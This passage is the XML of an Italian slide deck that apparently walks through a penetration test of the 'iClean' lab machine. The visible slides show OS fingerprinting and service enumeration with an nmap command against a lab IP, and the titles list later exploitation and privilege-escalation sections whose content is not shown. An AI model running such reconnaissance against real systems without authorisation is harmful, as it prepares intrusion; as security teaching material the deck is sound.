              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tutti questi comandi possono essere seguiti dal flag –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> per avere un file in output persistente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Anche se eravamo già a conoscenza del fatto che è una macchina Linux tramite la fase di information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1"/>
              <a:t>Gathering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="OS Fingerprinting&#10;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA3C5B5-5B2A-7E81-D8E7-2BC547B2C811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="3103122"/>
            <a:ext cx="5412274" cy="2814382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13092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67CE0AF2-326F-4B0F-B97A-2C14B3CE19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4E8B05B5-D3AB-4AAC-B97A-7D65FF85F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47EC12-BFF1-4F97-8364-51C4DF812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715F011-94BA-47DC-834F-1388B34219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06A0AD-93DC-442E-9F60-B30CEAF7DD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D3C365-CE85-4FAC-B746-E04C9F92A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8454BD-0545-4C56-BD44-0FD16077F2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2AB6B5-F9FA-46C4-9677-F28F2A3BC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888551-D4D1-46F5-975D-320FB87DBC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7C48A2-7C70-4832-8EA1-F4690A5F6B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B11DE8-28CF-46C2-AB13-7AE209801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395973-46DA-4BF6-B9C1-F0B4512DE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CFEEC4-7A30-4BB7-91CE-1BBA13833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A0F616-0997-42B0-83B2-BDF6BB350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4B0F3E-07AE-40F2-ACA8-84BBAEE5B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948B5D-3085-4444-95B3-2ED3F19C1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5B0FDF0-2286-4AD5-8409-EC8B706C5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8842C3-3266-4C74-A6BF-5529C9CC25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920E458-6F68-46DF-9407-9E6AD8CE2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CB4A57-7F7E-426D-93B5-984A8F8BC6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038EA1-A5C8-4528-9DEC-35C3970C2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CC18C7B-5800-46CC-B5DF-8B8D91A1B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AFBA18-1DE7-4213-9CF2-DAA4886EA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09AD18-3DFF-4A2A-BA06-5B62BC9F3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9349A2-4AE5-4765-852E-EDD390D0E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551698-2DD2-4F8E-ABB8-0CBAE048C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D68F4A-8464-4C0E-8E8F-218BA86E10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142AB3-3DD8-414B-8BB3-2E30DBD75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796E03-EB21-459D-96EA-B0EE0109B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2F4A84E-E201-47CA-85A4-25A9D7662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03A65C-C198-4FD0-8FF6-BBF0C3AA8D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344B27-CEB6-40F4-A75F-54415ACD5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4" name="Freeform: Shape 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD965435-B881-4C53-9917-5CDFE7688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9"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ight Triangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72D91726-E656-4E99-9757-0A6650CB0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151704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FC302817-CCFB-19E9-9C3D-92C43F8366B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="725951"/>
            <a:ext cx="4418418" cy="1918215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ED3525D-D54D-EE69-B707-C366A2D538BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336275" y="725951"/>
            <a:ext cx="5696415" cy="1918215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Andiamo ad enumerarci tutti i servizi che espone la macchina target verso la rete:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Servizi attivi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 10.10.11.12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E0E798-F7D2-3340-CA37-ABC25D08D1E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2239217" y="2883005"/>
            <a:ext cx="7245335" cy="3260400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3308709744"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="CosineVTI">
  <a:themeElements>
    <a:clrScheme name="AnalogousFromLightSeedRightStep">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="412D24"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E2E6E8"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BF9989"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="AFA078"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A1A77E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8DAA74"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="83AC81"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="77AE8C"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="5E899C"/>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66</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Tema</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Titoli diapositive</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>66</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="67" baseType="lpstr">
      <vt:lpstr>CosineVTI</vt:lpstr>
      <vt:lpstr>iClean</vt:lpstr>
      <vt:lpstr>Indice</vt:lpstr>
      <vt:lpstr>Metodologia utilizzata</vt:lpstr>
      <vt:lpstr>Strumenti utilizzati</vt:lpstr>
      <vt:lpstr>Informazioni preliminari</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Target Discovery </vt:lpstr>
      <vt:lpstr>Target Discovery </vt:lpstr>
      <vt:lpstr>Enumerating target</vt:lpstr>
      <vt:lpstr>Enumerating target </vt:lpstr>
      <vt:lpstr>Prima parte </vt:lpstr>
      <vt:lpstr>Seconda parte</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</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analisi manuale</vt:lpstr>
      <vt:lpstr>Vulnerability mapping – Database assessment</vt:lpstr>
      <vt:lpstr>Vulnerability mapping – Database assessment</vt:lpstr>
      <vt:lpstr>Vulnerability mapping – Database assessment</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Target Exploitation </vt:lpstr>
      <vt:lpstr>Privilege Escalation </vt:lpstr>
      <vt:lpstr>Privilege Escalation </vt:lpstr>
      <vt:lpstr>Privilege Escalation </vt:lpstr>
      <vt:lpstr>Privilege Escalation </vt:lpstr>
      <vt:lpstr>Privilege Escalation </vt:lpstr>
      <vt:lpstr>Maintaining access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
  <cp:revision>519</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-06T09:00:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-06T15:12:09Z</dcterms:modified>
</cp:coreProperties>
</file>